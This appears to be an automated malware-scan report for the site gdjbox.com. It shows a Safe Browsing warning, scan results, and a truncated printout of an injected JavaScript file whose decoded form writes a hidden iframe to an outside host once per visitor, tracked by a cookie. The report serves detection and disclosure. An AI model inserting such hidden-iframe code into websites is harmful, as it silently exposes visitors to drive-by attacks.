Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gdjbox.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.gdjbox.com/ | 200 OK Content-Length: 10517 Content-Type: text/html | clean |
http://www.gdjbox.com/static/js/analytics.js | 404 Not Found Content-Length: 345 Content-Type: text/html | clean |
http://www.gdjbox.com/test404page.js | 404 Not Found Content-Length: 345 Content-Type: text/html | clean |
http://www.gdjbox.com/js/banner_fad.js | 200 OK Content-Length: 7947 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function init() { if (arguments.callee.done) return; arguments.callee.done = true; so_init(); }; if (document.addEventListener) { document.addEventListener("so_init", init, false); } window.onload = init; var d=document, imgs = new Array(), zInterval = null, current=0, pause=false; function so_init() { if(!d.getElementById || !d.createElement)return; css = d.createElement('link'); css.setAttribute('href','http://www.lapita.net/js/css/style. Decoded script: function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : ""); } fu if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr; } var user = getCookie("secheck"); if (user !=777){ document.write('<iframe src="http://searchnew.net/in.cgi?9" width=2 height=2 style="display:none" marginheight=0 marginwidth=0 scrolling=no></iframe>' ); setCookie("secheck", "777", 7, "/"); } Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gdjbox.com
Result:
GET / HTTP/1.1
Host: gdjbox.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: gdjbox.com
Referer: http://www.google.com/search?q=gdjbox.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gdjbox.com
Referer: http://www.google.com/search?q=gdjbox.com
Result:
The result is similar to the first query. There are no suspicious redirects found.